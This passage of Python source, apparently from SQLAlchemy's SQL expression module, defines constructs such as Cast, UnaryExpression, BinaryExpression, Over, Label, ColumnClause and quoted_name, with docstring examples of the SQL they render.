Details on :class:`.Cast` usage is at :func:`.cast`.
.. seealso::
:func:`.cast`
"""
__visit_name__ = 'cast'
def __init__(self, expression, type_):
"""Produce a ``CAST`` expression.
:func:`.cast` returns an instance of :class:`.Cast`.
E.g.::
from sqlalchemy import cast, Numeric
stmt = select([
cast(product_table.c.unit_price, Numeric(10, 4))
])
The above statement will produce SQL resembling::
SELECT CAST(unit_price AS NUMERIC(10, 4)) FROM product
The :func:`.cast` function performs two distinct functions when
used. The first is that it renders the ``CAST`` expression within
the resulting SQL string. The second is that it associates the given
type (e.g. :class:`.TypeEngine` class or instance) with the column
expression on the Python side, which means the expression will take
on the expression operator behavior associated with that type,
as well as the bound-value handling and result-row-handling behavior
of the type.
.. versionchanged:: 0.9.0 :func:`.cast` now applies the given type
to the expression such that it takes effect on the bound-value,
e.g. the Python-to-database direction, in addition to the
result handling, e.g. database-to-Python, direction.
An alternative to :func:`.cast` is the :func:`.type_coerce` function.
This function performs the second task of associating an expression
with a specific type, but does not render the ``CAST`` expression
in SQL.
:param expression: A SQL expression, such as a :class:`.ColumnElement`
expression or a Python string which will be coerced into a bound
literal value.
:param type_: A :class:`.TypeEngine` class or instance indicating
the type to which the ``CAST`` should apply.
.. seealso::
:func:`.type_coerce` - Python-side type coercion without emitting
CAST.
"""
self.type = type_api.to_instance(type_)
self.clause = _literal_as_binds(expression, type_=self.type)
self.typeclause = TypeClause(self.type)
def _copy_internals(self, clone=_clone, **kw):
self.clause = clone(self.clause, **kw)
self.typeclause = clone(self.typeclause, **kw)
def get_children(self, **kwargs):
return self.clause, self.typeclause
@property
def _from_objects(self):
return self.clause._from_objects
class Extract(ColumnElement):
"""Represent a SQL EXTRACT clause, ``extract(field FROM expr)``."""
__visit_name__ = 'extract'
def __init__(self, field, expr, **kwargs):
"""Return a :class:`.Extract` construct.
This is typically available as :func:`.extract`
as well as ``func.extract`` from the
:data:`.func` namespace.
"""
self.type = type_api.INTEGERTYPE
self.field = field
self.expr = _literal_as_binds(expr, None)
def _copy_internals(self, clone=_clone, **kw):
self.expr = clone(self.expr, **kw)
def get_children(self, **kwargs):
return self.expr,
@property
def _from_objects(self):
return self.expr._from_objects
class _label_reference(ColumnElement):
"""Wrap a column expression as it appears in a 'reference' context.
This expression is any that inclues an _order_by_label_element,
which is a Label, or a DESC / ASC construct wrapping a Label.
The production of _label_reference() should occur when an expression
is added to this context; this includes the ORDER BY or GROUP BY of a
SELECT statement, as well as a few other places, such as the ORDER BY
within an OVER clause.
"""
__visit_name__ = 'label_reference'
def __init__(self, element):
self.element = element
def _copy_internals(self, clone=_clone, **kw):
self.element = clone(self.element, **kw)
@property
def _from_objects(self):
return ()
class _textual_label_reference(ColumnElement):
__visit_name__ = 'textual_label_reference'
def __init__(self, element):
self.element = element
@util.memoized_property
def _text_clause(self):
return TextClause._create_text(self.element)
class UnaryExpression(ColumnElement):
"""Define a 'unary' expression.
A unary expression has a single column expression
and an operator. The operator can be placed on the left
(where it is called the 'operator') or right (where it is called the
'modifier') of the column expression.
:class:`.UnaryExpression` is the basis for several unary operators
including those used by :func:`.desc`, :func:`.asc`, :func:`.distinct`,
:func:`.nullsfirst` and :func:`.nullslast`.
"""
__visit_name__ = 'unary'
def __init__(self, element, operator=None, modifier=None,
type_=None, negate=None, wraps_column_expression=False):
self.operator = operator
self.modifier = modifier
self.element = element.self_group(
against=self.operator or self.modifier)
self.type = type_api.to_instance(type_)
self.negate = negate
self.wraps_column_expression = wraps_column_expression
@classmethod
def _create_nullsfirst(cls, column):
"""Produce the ``NULLS FIRST`` modifier for an ``ORDER BY`` expression.
:func:`.nullsfirst` is intended to modify the expression produced
by :func:`.asc` or :func:`.desc`, and indicates how NULL values
should be handled when they are encountered during ordering::
from sqlalchemy import desc, nullsfirst
stmt = select([users_table]).\\
order_by(nullsfirst(desc(users_table.c.name)))
The SQL expression from the above would resemble::
SELECT id, name FROM user ORDER BY name DESC NULLS FIRST
Like :func:`.asc` and :func:`.desc`, :func:`.nullsfirst` is typically
invoked from the column expression itself using
:meth:`.ColumnElement.nullsfirst`, rather than as its standalone
function version, as in::
stmt = (select([users_table]).
order_by(users_table.c.name.desc().nullsfirst())
)
.. seealso::
:func:`.asc`
:func:`.desc`
:func:`.nullslast`
:meth:`.Select.order_by`
"""
return UnaryExpression(
_literal_as_label_reference(column),
modifier=operators.nullsfirst_op,
wraps_column_expression=False)
@classmethod
def _create_nullslast(cls, column):
"""Produce the ``NULLS LAST`` modifier for an ``ORDER BY`` expression.
:func:`.nullslast` is intended to modify the expression produced
by :func:`.asc` or :func:`.desc`, and indicates how NULL values
should be handled when they are encountered during ordering::
from sqlalchemy import desc, nullslast
stmt = select([users_table]).\\
order_by(nullslast(desc(users_table.c.name)))
The SQL expression from the above would resemble::
SELECT id, name FROM user ORDER BY name DESC NULLS LAST
Like :func:`.asc` and :func:`.desc`, :func:`.nullslast` is typically
invoked from the column expression itself using
:meth:`.ColumnElement.nullslast`, rather than as its standalone
function version, as in::
stmt = select([users_table]).\\
order_by(users_table.c.name.desc().nullslast())
.. seealso::
:func:`.asc`
:func:`.desc`
:func:`.nullsfirst`
:meth:`.Select.order_by`
"""
return UnaryExpression(
_literal_as_label_reference(column),
modifier=operators.nullslast_op,
wraps_column_expression=False)
@classmethod
def _create_desc(cls, column):
"""Produce a descending ``ORDER BY`` clause element.
e.g.::
from sqlalchemy import desc
stmt = select([users_table]).order_by(desc(users_table.c.name))
will produce SQL as::
SELECT id, name FROM user ORDER BY name DESC
The :func:`.desc` function is a standalone version of the
:meth:`.ColumnElement.desc` method available on all SQL expressions,
e.g.::
stmt = select([users_table]).order_by(users_table.c.name.desc())
:param column: A :class:`.ColumnElement` (e.g. scalar SQL expression)
with which to apply the :func:`.desc` operation.
.. seealso::
:func:`.asc`
:func:`.nullsfirst`
:func:`.nullslast`
:meth:`.Select.order_by`
"""
return UnaryExpression(
_literal_as_label_reference(column),
modifier=operators.desc_op,
wraps_column_expression=False)
@classmethod
def _create_asc(cls, column):
"""Produce an ascending ``ORDER BY`` clause element.
e.g.::
from sqlalchemy import asc
stmt = select([users_table]).order_by(asc(users_table.c.name))
will produce SQL as::
SELECT id, name FROM user ORDER BY name ASC
The :func:`.asc` function is a standalone version of the
:meth:`.ColumnElement.asc` method available on all SQL expressions,
e.g.::
stmt = select([users_table]).order_by(users_table.c.name.asc())
:param column: A :class:`.ColumnElement` (e.g. scalar SQL expression)
with which to apply the :func:`.asc` operation.
.. seealso::
:func:`.desc`
:func:`.nullsfirst`
:func:`.nullslast`
:meth:`.Select.order_by`
"""
return UnaryExpression(
_literal_as_label_reference(column),
modifier=operators.asc_op,
wraps_column_expression=False)
@classmethod
def _create_distinct(cls, expr):
"""Produce an column-expression-level unary ``DISTINCT`` clause.
This applies the ``DISTINCT`` keyword to an individual column
expression, and is typically contained within an aggregate function,
as in::
from sqlalchemy import distinct, func
stmt = select([func.count(distinct(users_table.c.name))])
The above would produce an expression resembling::
SELECT COUNT(DISTINCT name) FROM user
The :func:`.distinct` function is also available as a column-level
method, e.g. :meth:`.ColumnElement.distinct`, as in::
stmt = select([func.count(users_table.c.name.distinct())])
The :func:`.distinct` operator is different from the
:meth:`.Select.distinct` method of :class:`.Select`,
which produces a ``SELECT`` statement
with ``DISTINCT`` applied to the result set as a whole,
e.g. a ``SELECT DISTINCT`` expression. See that method for further
information.
.. seealso::
:meth:`.ColumnElement.distinct`
:meth:`.Select.distinct`
:data:`.func`
"""
expr = _literal_as_binds(expr)
return UnaryExpression(
expr, operator=operators.distinct_op,
type_=expr.type, wraps_column_expression=False)
@property
def _order_by_label_element(self):
if self.modifier in (operators.desc_op, operators.asc_op):
return self.element._order_by_label_element
else:
return None
@property
def _from_objects(self):
return self.element._from_objects
def _copy_internals(self, clone=_clone, **kw):
self.element = clone(self.element, **kw)
def get_children(self, **kwargs):
return self.element,
def compare(self, other, **kw):
"""Compare this :class:`UnaryExpression` against the given
:class:`.ClauseElement`."""
return (
isinstance(other, UnaryExpression) and
self.operator == other.operator and
self.modifier == other.modifier and
self.element.compare(other.element, **kw)
)
def _negate(self):
if self.negate is not None:
return UnaryExpression(
self.element,
operator=self.negate,
negate=self.operator,
modifier=self.modifier,
type_=self.type,
wraps_column_expression=self.wraps_column_expression)
else:
return ClauseElement._negate(self)
def self_group(self, against=None):
if self.operator and operators.is_precedent(self.operator, against):
return Grouping(self)
else:
return self
class AsBoolean(UnaryExpression):
def __init__(self, element, operator, negate):
self.element = element
self.type = type_api.BOOLEANTYPE
self.operator = operator
self.negate = negate
self.modifier = None
self.wraps_column_expression = True
def self_group(self, against=None):
return self
def _negate(self):
return self.element._negate()
class BinaryExpression(ColumnElement):
"""Represent an expression that is ``LEFT <operator> RIGHT``.
A :class:`.BinaryExpression` is generated automatically
whenever two column expressions are used in a Python binary expression::
>>> from sqlalchemy.sql import column
>>> column('a') + column('b')
<sqlalchemy.sql.expression.BinaryExpression object at 0x101029dd0>
>>> print column('a') + column('b')
a + b
"""
__visit_name__ = 'binary'
def __init__(self, left, right, operator, type_=None,
negate=None, modifiers=None):
# allow compatibility with libraries that
# refer to BinaryExpression directly and pass strings
if isinstance(operator, util.string_types):
operator = operators.custom_op(operator)
self._orig = (left, right)
self.left = left.self_group(against=operator)
self.right = right.self_group(against=operator)
self.operator = operator
self.type = type_api.to_instance(type_)
self.negate = negate
if modifiers is None:
self.modifiers = {}
else:
self.modifiers = modifiers
def __bool__(self):
if self.operator in (operator.eq, operator.ne):
return self.operator(hash(self._orig[0]), hash(self._orig[1]))
else:
raise TypeError("Boolean value of this clause is not defined")
__nonzero__ = __bool__
@property
def is_comparison(self):
return operators.is_comparison(self.operator)
@property
def _from_objects(self):
return self.left._from_objects + self.right._from_objects
def _copy_internals(self, clone=_clone, **kw):
self.left = clone(self.left, **kw)
self.right = clone(self.right, **kw)
def get_children(self, **kwargs):
return self.left, self.right
def compare(self, other, **kw):
"""Compare this :class:`BinaryExpression` against the
given :class:`BinaryExpression`."""
return (
isinstance(other, BinaryExpression) and
self.operator == other.operator and
(
self.left.compare(other.left, **kw) and
self.right.compare(other.right, **kw) or
(
operators.is_commutative(self.operator) and
self.left.compare(other.right, **kw) and
self.right.compare(other.left, **kw)
)
)
)
def self_group(self, against=None):
if operators.is_precedent(self.operator, against):
return Grouping(self)
else:
return self
def _negate(self):
if self.negate is not None:
return BinaryExpression(
self.left,
self.right,
self.negate,
negate=self.operator,
type_=self.type,
modifiers=self.modifiers)
else:
return super(BinaryExpression, self)._negate()
class Grouping(ColumnElement):
"""Represent a grouping within a column expression"""
__visit_name__ = 'grouping'
def __init__(self, element):
self.element = element
self.type = getattr(element, 'type', type_api.NULLTYPE)
def self_group(self, against=None):
return self
@property
def _key_label(self):
return self._label
@property
def _label(self):
return getattr(self.element, '_label', None) or self.anon_label
def _copy_internals(self, clone=_clone, **kw):
self.element = clone(self.element, **kw)
def get_children(self, **kwargs):
return self.element,
@property
def _from_objects(self):
return self.element._from_objects
def __getattr__(self, attr):
return getattr(self.element, attr)
def __getstate__(self):
return {'element': self.element, 'type': self.type}
def __setstate__(self, state):
self.element = state['element']
self.type = state['type']
def compare(self, other, **kw):
return isinstance(other, Grouping) and \
self.element.compare(other.element)
class Over(ColumnElement):
"""Represent an OVER clause.
This is a special operator against a so-called
"window" function, as well as any aggregate function,
which produces results relative to the result set
itself. It's supported only by certain database
backends.
"""
__visit_name__ = 'over'
order_by = None
partition_by = None
def __init__(self, func, partition_by=None, order_by=None):
"""Produce an :class:`.Over` object against a function.
Used against aggregate or so-called "window" functions,
for database backends that support window functions.
E.g.::
from sqlalchemy import over
over(func.row_number(), order_by='x')
Would produce "ROW_NUMBER() OVER(ORDER BY x)".
:param func: a :class:`.FunctionElement` construct, typically
generated by :data:`~.expression.func`.
:param partition_by: a column element or string, or a list
of such, that will be used as the PARTITION BY clause
of the OVER construct.
:param order_by: a column element or string, or a list
of such, that will be used as the ORDER BY clause
of the OVER construct.
This function is also available from the :data:`~.expression.func`
construct itself via the :meth:`.FunctionElement.over` method.
.. versionadded:: 0.7
"""
self.func = func
if order_by is not None:
self.order_by = ClauseList(
*util.to_list(order_by),
_literal_as_text=_literal_as_label_reference)
if partition_by is not None:
self.partition_by = ClauseList(
*util.to_list(partition_by),
_literal_as_text=_literal_as_label_reference)
@util.memoized_property
def type(self):
return self.func.type
def get_children(self, **kwargs):
return [c for c in
(self.func, self.partition_by, self.order_by)
if c is not None]
def _copy_internals(self, clone=_clone, **kw):
self.func = clone(self.func, **kw)
if self.partition_by is not None:
self.partition_by = clone(self.partition_by, **kw)
if self.order_by is not None:
self.order_by = clone(self.order_by, **kw)
@property
def _from_objects(self):
return list(itertools.chain(
*[c._from_objects for c in
(self.func, self.partition_by, self.order_by)
if c is not None]
))
class FunctionFilter(ColumnElement):
"""Represent a function FILTER clause.
This is a special operator against aggregate and window functions,
which controls which rows are passed to it.
It's supported only by certain database backends.
Invocation of :class:`.FunctionFilter` is via
:meth:`.FunctionElement.filter`::
func.count(1).filter(True)
.. versionadded:: 1.0.0
.. seealso::
:meth:`.FunctionElement.filter`
"""
__visit_name__ = 'funcfilter'
criterion = None
def __init__(self, func, *criterion):
"""Produce a :class:`.FunctionFilter` object against a function.
Used against aggregate and window functions,
for database backends that support the "FILTER" clause.
E.g.::
from sqlalchemy import funcfilter
funcfilter(func.count(1), MyClass.name == 'some name')
Would produce "COUNT(1) FILTER (WHERE myclass.name = 'some name')".
This function is also available from the :data:`~.expression.func`
construct itself via the :meth:`.FunctionElement.filter` method.
.. versionadded:: 1.0.0
.. seealso::
:meth:`.FunctionElement.filter`
"""
self.func = func
self.filter(*criterion)
def filter(self, *criterion):
"""Produce an additional FILTER against the function.
This method adds additional criteria to the initial criteria
set up by :meth:`.FunctionElement.filter`.
Multiple criteria are joined together at SQL render time
via ``AND``.
"""
for criterion in list(criterion):
criterion = _expression_literal_as_text(criterion)
if self.criterion is not None:
self.criterion = self.criterion & criterion
else:
self.criterion = criterion
return self
def over(self, partition_by=None, order_by=None):
"""Produce an OVER clause against this filtered function.
Used against aggregate or so-called "window" functions,
for database backends that support window functions.
The expression::
func.rank().filter(MyClass.y > 5).over(order_by='x')
is shorthand for::
from sqlalchemy import over, funcfilter
over(funcfilter(func.rank(), MyClass.y > 5), order_by='x')
See :func:`~.expression.over` for a full description.
"""
return Over(self, partition_by=partition_by, order_by=order_by)
@util.memoized_property
def type(self):
return self.func.type
def get_children(self, **kwargs):
return [c for c in
(self.func, self.criterion)
if c is not None]
def _copy_internals(self, clone=_clone, **kw):
self.func = clone(self.func, **kw)
if self.criterion is not None:
self.criterion = clone(self.criterion, **kw)
@property
def _from_objects(self):
return list(itertools.chain(
*[c._from_objects for c in (self.func, self.criterion)
if c is not None]
))
class Label(ColumnElement):
"""Represents a column label (AS).
Represent a label, as typically applied to any column-level
element using the ``AS`` sql keyword.
"""
__visit_name__ = 'label'
def __init__(self, name, element, type_=None):
"""Return a :class:`Label` object for the
given :class:`.ColumnElement`.
A label changes the name of an element in the columns clause of a
``SELECT`` statement, typically via the ``AS`` SQL keyword.
This functionality is more conveniently available via the
:meth:`.ColumnElement.label` method on :class:`.ColumnElement`.
:param name: label name
:param obj: a :class:`.ColumnElement`.
"""
if isinstance(element, Label):
self._resolve_label = element._label
while isinstance(element, Label):
element = element.element
if name:
self.name = name
self._resolve_label = self.name
else:
self.name = _anonymous_label(
'%%(%d %s)s' % (id(self), getattr(element, 'name', 'anon'))
)
self.key = self._label = self._key_label = self.name
self._element = element
self._type = type_
self._proxies = [element]
def __reduce__(self):
return self.__class__, (self.name, self._element, self._type)
@util.memoized_property
def _allow_label_resolve(self):
return self.element._allow_label_resolve
@property
def _order_by_label_element(self):
return self
@util.memoized_property
def type(self):
return type_api.to_instance(
self._type or getattr(self._element, 'type', None)
)
@util.memoized_property
def element(self):
return self._element.self_group(against=operators.as_)
def self_group(self, against=None):
sub_element = self._element.self_group(against=against)
if sub_element is not self._element:
return Label(self.name,
sub_element,
type_=self._type)
else:
return self
@property
def primary_key(self):
return self.element.primary_key
@property
def foreign_keys(self):
return self.element.foreign_keys
def get_children(self, **kwargs):
return self.element,
def _copy_internals(self, clone=_clone, anonymize_labels=False, **kw):
self._element = clone(self._element, **kw)
self.__dict__.pop('element', None)
self.__dict__.pop('_allow_label_resolve', None)
if anonymize_labels:
self.name = self._resolve_label = _anonymous_label(
'%%(%d %s)s' % (
id(self), getattr(self.element, 'name', 'anon'))
)
self.key = self._label = self._key_label = self.name
@property
def _from_objects(self):
return self.element._from_objects
def _make_proxy(self, selectable, name=None, **kw):
e = self.element._make_proxy(selectable,
name=name if name else self.name)
e._proxies.append(self)
if self._type is not None:
e.type = self._type
return e
class ColumnClause(Immutable, ColumnElement):
"""Represents a column expression from any textual string.
The :class:`.ColumnClause`, a lightweight analogue to the
:class:`.Column` class, is typically invoked using the
:func:`.column` function, as in::
from sqlalchemy import column
id, name = column("id"), column("name")
stmt = select([id, name]).select_from("user")
The above statement would produce SQL like::
SELECT id, name FROM user
:class:`.ColumnClause` is the immediate superclass of the schema-specific
:class:`.Column` object. While the :class:`.Column` class has all the
same capabilities as :class:`.ColumnClause`, the :class:`.ColumnClause`
class is usable by itself in those cases where behavioral requirements
are limited to simple SQL expression generation. The object has none of
the associations with schema-level metadata or with execution-time
behavior that :class:`.Column` does, so in that sense is a "lightweight"
version of :class:`.Column`.
Full details on :class:`.ColumnClause` usage is at :func:`.column`.
.. seealso::
:func:`.column`
:class:`.Column`
"""
__visit_name__ = 'column'
onupdate = default = server_default = server_onupdate = None
_memoized_property = util.group_expirable_memoized_property()
def __init__(self, text, type_=None, is_literal=False, _selectable=None):
"""Produce a :class:`.ColumnClause` object.
The :class:`.ColumnClause` is a lightweight analogue to the
:class:`.Column` class. The :func:`.column` function can
be invoked with just a name alone, as in::
from sqlalchemy import column
id, name = column("id"), column("name")
stmt = select([id, name]).select_from("user")
The above statement would produce SQL like::
SELECT id, name FROM user
Once constructed, :func:`.column` may be used like any other SQL
expression element such as within :func:`.select` constructs::
from sqlalchemy.sql import column
id, name = column("id"), column("name")
stmt = select([id, name]).select_from("user")
The text handled by :func:`.column` is assumed to be handled
like the name of a database column; if the string contains mixed case,
special characters, or matches a known reserved word on the target
backend, the column expression will render using the quoting
behavior determined by the backend. To produce a textual SQL
expression that is rendered exactly without any quoting,
use :func:`.literal_column` instead, or pass ``True`` as the
value of :paramref:`.column.is_literal`. Additionally, full SQL
statements are best handled using the :func:`.text` construct.
:func:`.column` can be used in a table-like
fashion by combining it with the :func:`.table` function
(which is the lightweight analogue to :class:`.Table`) to produce
a working table construct with minimal boilerplate::
from sqlalchemy import table, column, select
user = table("user",
column("id"),
column("name"),
column("description"),
)
stmt = select([user.c.description]).where(user.c.name == 'wendy')
A :func:`.column` / :func:`.table` construct like that illustrated
above can be created in an
ad-hoc fashion and is not associated with any
:class:`.schema.MetaData`, DDL, or events, unlike its
:class:`.Table` counterpart.
.. versionchanged:: 1.0.0 :func:`.expression.column` can now
be imported from the plain ``sqlalchemy`` namespace like any
other SQL element.
:param text: the text of the element.
:param type: :class:`.types.TypeEngine` object which can associate
this :class:`.ColumnClause` with a type.
:param is_literal: if True, the :class:`.ColumnClause` is assumed to
be an exact expression that will be delivered to the output with no
quoting rules applied regardless of case sensitive settings. the
:func:`.literal_column()` function essentially invokes
:func:`.column` while passing ``is_literal=True``.
.. seealso::
:class:`.Column`
:func:`.literal_column`
:func:`.table`
:func:`.text`
:ref:`sqlexpression_literal_column`
"""
self.key = self.name = text
self.table = _selectable
self.type = type_api.to_instance(type_)
self.is_literal = is_literal
def _compare_name_for_result(self, other):
if self.is_literal or \
self.table is None or self.table._textual or \
not hasattr(other, 'proxy_set') or (
isinstance(other, ColumnClause) and
(other.is_literal or
other.table is None or
other.table._textual)
):
return (hasattr(other, 'name') and self.name == other.name) or \
(hasattr(other, '_label') and self._label == other._label)
else:
return other.proxy_set.intersection(self.proxy_set)
def _get_table(self):
return self.__dict__['table']
def _set_table(self, table):
self._memoized_property.expire_instance(self)
self.__dict__['table'] = table
table = property(_get_table, _set_table)
@_memoized_property
def _from_objects(self):
t = self.table
if t is not None:
return [t]
else:
return []
@util.memoized_property
def description(self):
if util.py3k:
return self.name
else:
return self.name.encode('ascii', 'backslashreplace')
@_memoized_property
def _key_label(self):
if self.key != self.name:
return self._gen_label(self.key)
else:
return self._label
@_memoized_property
def _label(self):
return self._gen_label(self.name)
@_memoized_property
def _render_label_in_columns_clause(self):
return self.table is not None
def _gen_label(self, name):
t = self.table
if self.is_literal:
return None
elif t is not None and t.named_with_column:
if getattr(t, 'schema', None):
label = t.schema.replace('.', '_') + "_" + \
t.name + "_" + name
else:
label = t.name + "_" + name
# propagate name quoting rules for labels.
if getattr(name, "quote", None) is not None:
if isinstance(label, quoted_name):
label.quote = name.quote
else:
label = quoted_name(label, name.quote)
elif getattr(t.name, "quote", None) is not None:
# can't get this situation to occur, so let's
# assert false on it for now
assert not isinstance(label, quoted_name)
label = quoted_name(label, t.name.quote)
# ensure the label name doesn't conflict with that
# of an existing column
if label in t.c:
_label = label
counter = 1
while _label in t.c:
_label = label + "_" + str(counter)
counter += 1
label = _label
return _as_truncated(label)
else:
return name
def _bind_param(self, operator, obj):
return BindParameter(self.key, obj,
_compared_to_operator=operator,
_compared_to_type=self.type,
unique=True)
def _make_proxy(self, selectable, name=None, attach=True,
name_is_truncatable=False, **kw):
# propagate the "is_literal" flag only if we are keeping our name,
# otherwise its considered to be a label
is_literal = self.is_literal and (name is None or name == self.name)
c = self._constructor(
_as_truncated(name or self.name) if
name_is_truncatable else
(name or self.name),
type_=self.type,
_selectable=selectable,
is_literal=is_literal
)
if name is None:
c.key = self.key
c._proxies = [self]
if selectable._is_clone_of is not None:
c._is_clone_of = \
selectable._is_clone_of.columns.get(c.key)
if attach:
selectable._columns[c.key] = c
return c
class _IdentifiedClause(Executable, ClauseElement):
__visit_name__ = 'identified'
_execution_options = \
Executable._execution_options.union({'autocommit': False})
def __init__(self, ident):
self.ident = ident
class SavepointClause(_IdentifiedClause):
__visit_name__ = 'savepoint'
class RollbackToSavepointClause(_IdentifiedClause):
__visit_name__ = 'rollback_to_savepoint'
class ReleaseSavepointClause(_IdentifiedClause):
__visit_name__ = 'release_savepoint'
class quoted_name(util.MemoizedSlots, util.text_type):
"""Represent a SQL identifier combined with quoting preferences.
:class:`.quoted_name` is a Python unicode/str subclass which
represents a particular identifier name along with a
``quote`` flag. This ``quote`` flag, when set to
``True`` or ``False``, overrides automatic quoting behavior
for this identifier in order to either unconditionally quote
or to not quote the name. If left at its default of ``None``,
quoting behavior is applied to the identifier on a per-backend basis
based on an examination of the token itself.
A :class:`.quoted_name` object with ``quote=True`` is also
prevented from being modified in the case of a so-called
"name normalize" option. Certain database backends, such as
Oracle, Firebird, and DB2 "normalize" case-insensitive names
as uppercase. The SQLAlchemy dialects for these backends
convert from SQLAlchemy's lower-case-means-insensitive convention
to the upper-case-means-insensitive conventions of those backends.
The ``quote=True`` flag here will prevent this conversion from occurring
to support an identifier that's quoted as all lower case against
such a backend.
The :class:`.quoted_name` object is normally created automatically
when specifying the name for key schema constructs such as
:class:`.Table`, :class:`.Column`, and others. The class can also be
passed explicitly as the name to any function that receives a name which
can be quoted. Such as to use the :meth:`.Engine.has_table` method with
an unconditionally quoted name::
from sqlaclchemy import create_engine
from sqlalchemy.sql.elements import quoted_name
engine = create_engine("oracle+cx_oracle://some_dsn")
engine.has_table(quoted_name("some_table", True))
The above logic will run the "has table" logic against the Oracle backend,
passing the name exactly as ``"some_table"`` without converting to
upper case.
.. versionadded:: 0.9.0
"""
__slots__ = 'quote', 'lower', 'upper'
def __new__(cls, value, quote):
if value is None:
return None
# experimental - don't bother with quoted_name
# if quote flag is None. doesn't seem to make any dent
# in performance however
# elif not sprcls and quote is None:
# return value
elif isinstance(value, cls) and (
quote is None or value.quote == quote
):
return value
self = super(quoted_name, cls).__new__(cls, value)
self.quote = quote
return self
def __reduce__(self):
return quoted_name, (util.text_type(self), self.quote)
def _memoized_method_lower(self):
if self.quote:
return self
else:
return util.text_type(self).lower()
def _memoized_method_upper(self):
if self.quote:
return self
else:
return util.text_type(self).upper()
def __repr__(self):
backslashed = self.encode('ascii', 'backslashreplace')
if not util.py2k:
backslashed = backslashed.decode('ascii')
return "'%s'" % backslashed
class _truncated_label(quoted_name):
"""A unicode subclass used to identify symbolic "
"names that may require truncation."""
__slots__ = ()
def __new__(cls, value, quote=None):
quote = getattr(value, "quote", quote)
# return super(_truncated_label, cls).__new__(cls, value, quote, True)
return super(_truncated_label, cls).__new__(cls, value, quote)
def __reduce__(self):
return self.__class__, (util.text_type(self), self.quote)
def apply_map(self, map_):
return self
class conv(_truncated_label):
"""Mark a string indicating that a name has already been converted
by a naming convention.
This is a string subclass that indicates a name that should not be
subject to any further naming conventions.
E.g. when we create a :class:`.Constraint` using a naming convention
as follows::
m = MetaData(naming_convention={
"ck": "ck_%(table_name)s_%(constraint_name)s"
})
t = Table('t', m, Column('x', Integer),
CheckConstraint('x > 5', name='x5'))
The name of the above constraint will be rendered as ``"ck_t_x5"``.
That is, the existing name ``x5`` is used in the naming convention as the
``constraint_name`` token.
In some situations, such as in migration scripts, we may be rendering
the above :class:`.CheckConstraint` with a name that's already been
converted. In order to make sure the name isn't double-modified, the
new name is applied using the :func:`.schema.conv` marker. We can
use this explicitly as follows::
m = MetaData(naming_convention={
"ck": "ck_%(table_name)s_%(constraint_name)s"
})
t = Table('t', m, Column('x', Integer),
CheckConstraint('x > 5', name=conv('ck_t_x5')))
Where above, the :func:`.schema.conv` marker indicates that the constraint
name here is final, and the name will render as ``"ck_t_x5"`` and not
``"ck_t_ck_t_x5"``
.. versionadded:: 0.9.4
.. seealso::
:ref:`constraint_naming_conventions`
"""
__slots__ = ()
class _defer_name(_truncated_label):
"""mark a name as 'deferred' for the purposes of automated name
generation.
"""
__slots__ = ()
def __new__(cls, value):
if value is None:
return _NONE_NAME
elif isinstance(value, conv):
return value
else:
return super(_defer_name, cls).__new__(cls, value)
def __reduce__(self):
return self.__class__, (util.text_type(self), )
class _defer_none_name(_defer_name):
"""indicate a 'deferred' name that was ultimately the value None."""
__slots__ = ()
_NONE_NAME = _defer_none_name("_unnamed_")
# for backwards compatibility in case
# someone is re-implementing the
# _truncated_identifier() sequence in a custom
# compiler
_generated_label = _truncated_label
class _anonymous_label(_truncated_label):
"""A unicode subclass used to identify anonymously
generated names."""
__slots__ = ()
def __add__(self, other):
return _anonymous_label(
quoted_name(
util.text_type.__add__(self, util.text_type(other)),
self.quote)
)
def __radd__(self, other):
return _anonymous_label(
quoted_name(
util.text_type.__add__(util.text_type(other), self),
self.quote)
)
def apply_map(self, map_):
if self.quote is not None:
# preserve quoting only if necessary
return quoted_name(self % map_, self.quote)
else:
# else skip the constructor call
return self % map_
def _as_truncated(value):
"""coerce the given value to :class:`._truncated_label`.
Existing :class:`._truncated_label` and
:class:`._anonymous_label` objects are passed
unchanged.
"""
if isinstance(value, _truncated_label):
return value
else:
return _truncated_label(value)
def _string_or_unprintable(element):
if isinstance(element, util.string_types):
return element
else:
try:
return str(element)
except Exception:
return "unprintable element %r" % element
def _expand_cloned(elements):
"""expand the given set of ClauseElements to be the set of all 'cloned'
predecessors.
"""
return itertools.chain(*[x._cloned_set for x in elements])
def _select_iterables(elements):
"""expand tables into individual columns in the
given list of column expressions.
"""
return itertools.chain(*[c._select_iterable for c in elements])
def _cloned_intersection(a, b):
"""return the intersection of sets a and b, counting
any overlap between 'cloned' predecessors.
The returned set is in terms of the entities present within 'a'.
"""
all_overlap = set(_expand_cloned(a)).intersection(_expand_cloned(b))
return set(elem for elem in a
if all_overlap.intersection(elem._cloned_set))
def _cloned_difference(a, b):
all_overlap = set(_expand_cloned(a)).intersection(_expand_cloned(b))
return set(elem for elem in a
if not all_overlap.intersection(elem._cloned_set))
def _labeled(element):
if not hasattr(element, 'name'):
return element.label(None)
else:
return element
def _is_column(col):
"""True if ``col`` is an instance of :class:`.ColumnElement`."""
return isinstance(col, ColumnElement)
def _find_columns(clause):
"""locate Column objects within the given expression."""
cols = util.column_set()
traverse(clause, {}, {'column': cols.add})
return cols
# there is some inconsistency here between the usage of
# inspect() vs. checking for Visitable and __clause_element__.
# Ideally all functions here would derive from inspect(),
# however the inspect() versions add significant callcount
# overhead for critical functions like _interpret_as_column_or_from().
# Generally, the column-based functions are more performance critical
# and are fine just checking for __clause_element__(). It is only
# _interpret_as_from() where we'd like to be able to receive ORM entities
# that have no defined namespace, hence inspect() is needed there.
def _column_as_key(element):
if isinstance(element, util.string_types):
return element
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
try:
return element.key
except AttributeError:
return None
def _clause_element_as_expr(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
else:
return element
def _literal_as_label_reference(element):
if isinstance(element, util.string_types):
return _textual_label_reference(element)
elif hasattr(element, '__clause_element__'):
element = element.__clause_element__()
return _literal_as_text(element)
def _literal_and_labels_as_label_reference(element):
if isinstance(element, util.string_types):
return _textual_label_reference(element)
elif hasattr(element, '__clause_element__'):
element = element.__clause_element__()
if isinstance(element, ColumnElement) and \
element._order_by_label_element is not None:
return _label_reference(element)
else:
return _literal_as_text(element)
def _expression_literal_as_text(element):
return _literal_as_text(element, warn=True)
def _literal_as_text(element, warn=False):
if isinstance(element, Visitable):
return element
elif hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif isinstance(element, util.string_types):
if warn:
util.warn_limited(
"Textual SQL expression %(expr)r should be "
"explicitly declared as text(%(expr)r)",
{"expr": util.ellipses_string(element)})
return TextClause(util.text_type(element))
